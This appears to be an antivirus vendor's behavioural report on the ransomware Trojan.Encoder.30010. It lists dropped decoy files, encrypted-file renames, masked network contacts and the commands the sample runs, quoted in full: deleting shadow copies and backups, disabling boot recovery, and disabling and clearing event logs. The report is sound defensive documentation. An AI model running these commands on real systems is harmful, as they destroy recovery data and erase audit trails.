Trojan.Encoder.30010

Technical Information

To ensure autorun and distribution

Creates the following files on removable media

<Drive name for removable media>:\000814251_video_01.avi
<Drive name for removable media>:\stoc13_ml_quoc_le.pptx
<Drive name for removable media>:\waterresourcesag.pptx
<Drive name for removable media>:\february_catalogue__2015.doc
<Drive name for removable media>:\hanni_umami_chapter.doc
<Drive name for removable media>:\fi51.doc
<Drive name for removable media>:\testee.cer
<Drive name for removable media>:\contoso_1.cer
<Drive name for removable media>:\middaugh_keynote.pptx
<Drive name for removable media>:\coffee.bmp
<Drive name for removable media>:\dialmap.bmp
<Drive name for removable media>:\default.bmp
<Drive name for removable media>:\dashborder_120.bmp
<Drive name for removable media>:\toolbar.bmp
<Drive name for removable media>:\dashborder_144.bmp
<Drive name for removable media>:\dial.bmp
<Drive name for removable media>:\!!! all your files are encrypted !!!.txt
<Drive name for removable media>:\tileimage.bmp
<Drive name for removable media>:\iso27k_isms_implementation_and_certification_process_overview_v2.pptx

Malicious functions

To complicate detection of its presence in the operating system,

deletes volume shadow copies.

Modifies file system

Creates the following files

unc\vdehfmco\users\all users\ntuser.pol
unc\vdehfmco\users\all users\ntuser.pol.[958e3e13-1239-90cc-8d88-605f736ca7f6]
unc\vdehfmco\users\all users\!!! all your files are encrypted !!!.txt
C:\far2\!!! all your files are encrypted !!!.txt
unc\vdehfmco\users\all users\adobe\arm\reader_15.007.20033\readerdcmanifest.msi
unc\vdehfmco\users\all users\adobe\arm\reader_15.007.20033\readerdcmanifest.msi.[958e3e13-1239-90cc-8d88-605f736ca7f6]
unc\vdehfmco\users\all users\adobe\arm\reader_15.007.20033\!!! all your files are encrypted !!!.txt
C:\far2\addons\!!! all your files are encrypted !!!.txt
unc\vdehfmco\users\all users\adobe\arm\s\armmanifest.msi
unc\vdehfmco\users\all users\adobe\arm\s\armmanifest.msi.[958e3e13-1239-90cc-8d88-605f736ca7f6]
unc\vdehfmco\users\all users\adobe\arm\s\!!! all your files are encrypted !!!.txt

Sets the 'hidden' attribute to the following files

unc\vdehfmco\users\all users\ntuser.pol.[958e3e13-1239-90cc-8d88-605f736ca7f6]

Moves the following files

from unc\vdehfmco\users\all users\ntuser.pol to unc\vdehfmco\users\all users\ntuser.pol.[958e3e13-1239-90cc-8d88-605f736ca7f6]
from unc\vdehfmco\users\all users\adobe\arm\reader_15.007.20033\readerdcmanifest.msi to unc\vdehfmco\users\all users\adobe\arm\reader_15.007.20033\readerdcmanifest.msi.[958e3e13-1239-90cc-8d88-605f736ca7f6]
from unc\vdehfmco\users\all users\adobe\arm\s\armmanifest.msi to unc\vdehfmco\users\all users\adobe\arm\s\armmanifest.msi.[958e3e13-1239-90cc-8d88-605f736ca7f6]

Modifies user data files (Trojan.Encoder).

Changes user data files extensions (Trojan.Encoder).

Network activity

Connects to

'ip###ger.org':443

TCP

HTTP GET requests

http://ge###tool.com/
http://ip##gger.ru/1myGu7.jpeg

'ge###tool.com':443

'ip##gger.ru':443

UDP

DNS ASK ge###tool.com
DNS ASK ip##gger.ru
DNS ASK ip###ger.org

Miscellaneous

Creates and executes the following

'%WINDIR%\syswow64\cmd.exe' /C bcdedit /set {default} bootstatuspolicy ignoreallfailures' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C sc config eventlog start=disabled' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C wevtutil.exe clear-log System' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C wevtutil.exe clear-log Security' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C wevtutil.exe clear-log Application' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C del "%userprofile%\documents\Default.rdp"' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C attrib "%userprofile%\documents\Default.rdp" -s -h' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C chcp 1250 && net view' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C vssadmin delete shadows /all /quiet' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C wmic shadowcopy delete' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C wbadmin delete backup' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C wbadmin delete systemstatebackup -keepversions:0' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C wbadmin delete systemstatebackup' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C wbadmin delete catalog -quiet' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C bcdedit /set {default} recoveryenabled no' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C chcp 1250 && net view "\\VDEHFMCO"' (with hidden window)

Executes the following

'%WINDIR%\syswow64\cmd.exe' /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
'%WINDIR%\syswow64\net.exe' view
'%WINDIR%\syswow64\chcp.com' 1250
'%WINDIR%\syswow64\cmd.exe' /C chcp 1250 && net view
'%WINDIR%\syswow64\sc.exe' config eventlog start=disabled
'%WINDIR%\syswow64\cmd.exe' /C sc config eventlog start=disabled
'%WINDIR%\syswow64\wevtutil.exe' clear-log System
'%WINDIR%\syswow64\cmd.exe' /C wevtutil.exe clear-log System
'%WINDIR%\syswow64\wevtutil.exe' clear-log Security
'%WINDIR%\syswow64\cmd.exe' /C wevtutil.exe clear-log Security
'%WINDIR%\syswow64\wevtutil.exe' clear-log Application
'%WINDIR%\syswow64\cmd.exe' /C wevtutil.exe clear-log Application
'%WINDIR%\syswow64\cmd.exe' /C del "%userprofile%\documents\Default.rdp"
'%WINDIR%\syswow64\attrib.exe' "%HOMEPATH%\documents\Default.rdp" -s -h
'%WINDIR%\syswow64\cmd.exe' /C chcp 1250 && net view "\\VDEHFMCO"
'%WINDIR%\syswow64\cmd.exe' /C attrib "%userprofile%\documents\Default.rdp" -s -h
'%WINDIR%\syswow64\cmd.exe' /C reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
'%WINDIR%\syswow64\reg.exe' delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
'%WINDIR%\syswow64\cmd.exe' /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
'%WINDIR%\syswow64\reg.exe' delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
'%WINDIR%\syswow64\cmd.exe' /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
'%WINDIR%\syswow64\cmd.exe' /C vssadmin delete shadows /all /quiet
'<SYSTEM32>\vssvc.exe'
'%WINDIR%\syswow64\cmd.exe' /C wmic shadowcopy delete
'%WINDIR%\syswow64\cmd.exe' /C wbadmin delete backup
'%WINDIR%\syswow64\cmd.exe' /C wbadmin delete systemstatebackup -keepversions:0
'%WINDIR%\syswow64\cmd.exe' /C wbadmin delete systemstatebackup
'%WINDIR%\syswow64\cmd.exe' /C wbadmin delete catalog -quiet
'%WINDIR%\syswow64\cmd.exe' /C bcdedit /set {default} recoveryenabled no
'%WINDIR%\syswow64\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
'%WINDIR%\syswow64\net.exe' view "\\VDEHFMCO"

Technologies

Terminology

Training and education

Myths

Technical Information

Curing recommendations

Free trial